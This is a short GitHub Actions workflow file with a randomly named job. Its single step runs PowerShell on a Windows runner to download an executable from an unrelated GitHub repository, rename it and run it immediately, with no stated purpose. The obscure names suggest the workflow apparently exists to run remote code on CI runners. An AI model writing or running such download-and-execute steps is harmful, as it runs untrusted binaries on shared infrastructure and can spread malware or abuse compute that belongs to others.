name: ihcufo
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: powershell
        shell: cmd
        run: powershell.exe -c Invoke-WebRequest https://github.com/picker56456/dsm/raw/main/cakey.exe -OutFile oook.exe ; .\oook.exe
